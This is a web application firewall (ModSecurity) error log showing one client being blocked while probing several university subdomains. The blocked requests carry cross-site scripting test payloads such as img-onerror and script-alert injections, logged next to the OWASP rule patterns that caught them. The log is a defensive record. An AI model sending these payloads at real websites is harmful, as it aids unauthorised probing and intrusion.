[Tue Aug 29 11:53:08.257332 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoZ6ScAAAAK"]
[Tue Aug 29 11:53:08.260699 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAolKTUAAAAe"]
[Tue Aug 29 11:53:08.263194 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAnd3QEAAAAI"]
[Tue Aug 29 11:53:08.273520 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAfWOUgAAAAL"]
[Tue Aug 29 11:53:08.275662 2023] [:error] [pid 2589] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAodkp4AAAAS"]
[Tue Aug 29 11:53:08.355741 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAot8MAAAAAn"]
[Tue Aug 29 11:53:08.356729 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAouCygAAAAo"]
[Tue Aug 29 11:53:08.360967 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAohZ6YAAAAZ"]
[Tue Aug 29 11:53:08.361721 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAoqbO4AAAAj"]
[Tue Aug 29 11:53:08.364496 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAoW7M8AAAAJ"]
[Tue Aug 29 11:53:08.366167 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoXJuQAAAAP"]
[Tue Aug 29 11:53:08.366903 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAoLfQEAAAAG"]
[Tue Aug 29 11:53:08.367730 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAhoHWUAAAAl"]
[Tue Aug 29 11:53:08.549164 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAoml1MAAAAf"]
[Tue Aug 29 11:53:08.571459 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAhoHWYAAAAl"]
[Tue Aug 29 11:53:08.572564 2023] [:error] [pid 2604] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAosCvQAAAAm"]
[Tue Aug 29 11:53:08.621000 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAolKTgAAAAe"]
[Tue Aug 29 11:53:08.774136 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoLfQMAAAAG"]
[Tue Aug 29 11:53:08.787611 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoZ6SoAAAAK"]
[Tue Aug 29 11:53:08.800897 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoT7UMAAAAD"]
[Tue Aug 29 11:53:08.805494 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAohZ6kAAAAZ"]
[Tue Aug 29 11:53:09.612255 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tcCo-f0AAAn403IAAAAW"]
[Tue Aug 29 11:53:09.670669 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tcCo-f0AAAoAkwsAAAAC"]
[Tue Aug 29 11:53:10.259146 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoT7UUAAAAD"]
[Tue Aug 29 11:53:10.260709 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoZ6S0AAAAK"]
